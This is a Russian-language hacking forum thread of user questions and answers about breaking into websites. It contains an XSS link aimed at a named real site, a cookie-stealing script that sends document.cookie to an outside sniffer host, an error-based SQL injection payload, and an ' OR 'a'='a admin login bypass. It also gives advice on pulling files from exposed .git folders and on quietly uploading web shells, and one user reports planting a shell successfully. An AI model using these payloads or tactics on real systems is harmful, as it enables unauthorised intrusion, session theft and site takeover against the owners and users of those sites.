Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    там в основном пути wp-content/plugins/ и т.д
     
  2. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    291
    Likes Received:
    55
    Reputations:
    20
    в таких файлах бывает можно найти пути к интересным файлам, через которые можно залиться.
    но если там только пути к плагинам, то вряд ли что-то можно сделать, кроме как проверить их на уязвимости
     
  3. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    а если вот так сделать?
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    склонируйте репозиторий, это же банально и легко гуглится
     
  5. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    пробовал, но похоже что в сам .git
    Forbidden
    You don't have permission to access /.git/ on this server.
    , а если добавить /index, то качается файл index размером чуть больше 450кб
     
  6. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    https://rdot.org/forum/showpost.php?p=32395&postcount=81
     
    RWD likes this.
  7. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    вообщем загрузил файл в git репозиторий, получил список, затем git checkout db-config.php и ничего не происходит. Все команды делаю в репозитории.
    Git выдаст сообщение об ошибке, т.к. запрашиваемый объект отсутствует в локальном репозитории этого не происходит
    Что я делаю не так?
     
    #867 RWD, 23 Nov 2015
    Last edited: 23 Nov 2015
  8. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    159
    Likes Received:
    41
    Reputations:
    2
    все понятно, но это работает только если есть доступ к git репозитории, а здесь только к файлу index
     
  9. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    какой запрос будет верным, чтобы вывести данные через error-based, если

    и символы комментария не работают (никакие, строку не отсечь), кавычки экранируются
    INJECTION - это инъекция
     
  10. Hussar

    Hussar New Member

    Joined:
    10 Nov 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.
     
  11. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    58
    Likes Received:
    12
    Reputations:
    5
    Если я правильно понял
    Code:
    http://www.alfa.com.tw/search.php?keyword="><script>document.location.href='http://google.com'</script>
    Проверял только в тор-браузере. Работает.
     
    Hussar likes this.
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    может вы имеете ввиду window.location? какая атака? кража кук?
    <script>window.location = "http://sniffer.ru/?"+document.cookie</script>
     
    _________________________
    Hussar likes this.
  13. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    по моему вопросу все оказалось очень просто, нужно было только угадать существующую колнку:

    Code:
    uid=63 and(select 1 from(select count(*),concat((select concat(user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and 63
     
  14. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

    Какие варианты могут быть залития шелла, ипб fopen не пашет)
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    У вас нет в списке fopen.
     
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    816
    Reputations:
    90
    php код значит выполнять можно? раз говоришь fopen не пашет
    file_put_contents ? может просто прав на запись нет?

    вообще среди запрещенных функций не вижу system/passthru, может сразу с консолью работать?
     
    _________________________
  17. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Добрый вечер, спасибо вам за ответ.
    Файл создается, но вот беда, в него ничего не записывается.
    Что может быть причиной?


    ps: я еще нахожусь в админки ipb, заливаю через настройки, файл создается но в него ничего не записывается.
     
  18. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Есть еще один вопрос, вообщем попробую вам объяснить ситуацию, есть сайт моментальных товаров, лазил по нему нашел одну уязвимость как я понимаю sql уязвимость!
    В административной панели в авторизации мною была найдена ошибка, а именно когда я подставлял за место логина и пароля " ' OR 'a'='a ", то я проходил авторизацию, но на данном веб-сервере имеются еще сайты/форумы и все они созданы под одним аккаунтом, мне необходимо вытащить данные что бы залить к примеру шелл, в админки вообще нету никаких заливалок файлов, а главное если я допустим вставляю "<?" то данный код сразу обрезается, попробовал разные варианты.)))
    Авторизация в modal окне происходит. sqlmap пробывал, но на сервере защита от дддоса, и сразу banned ip ;(
    Очень необходима ваша помощь, заранее благодарю, каждому ответившему плюсик в карму.
     
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Если вы банальным способом прошли авторизацию, значит вся админка кишит SQL-иньекциями, вот в ней и ковыряйтесь, может есть где файл конфига смены логин пасса? который скрыт под звездочками, а может и локальный инклуд заваляться при редактирование каких либо модулей, плагинов, вообщем без фантазии вы дальше не продвинитесь))

    если файл создается значит идет выполнение кода, но что то у вас идет не так, попробуйте в сам файл куда вы вписываите код вставить сам шелл, как пример с тем же выводом по ГЕТ запросу, для мение палевности...

    Вариантов море, учитесь смотреть другие разделы, гуглить, https://forum.antichat.ru/threads/307894/ - Не стандартные способы заливки шелла
    Вариантов море!
     
    _________________________
    #879 winstrool, 26 Nov 2015
    Last edited: 26 Nov 2015
    sysjuk likes this.
  20. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    226
    Likes Received:
    46
    Reputations:
    3
    Спасибо поставил вам, шелл действительно удалось залить.

    По поводу первого сайта, уязвимостей как раз больше и нету, только она одна была.
    Что можете посоветовать?
     
Loading...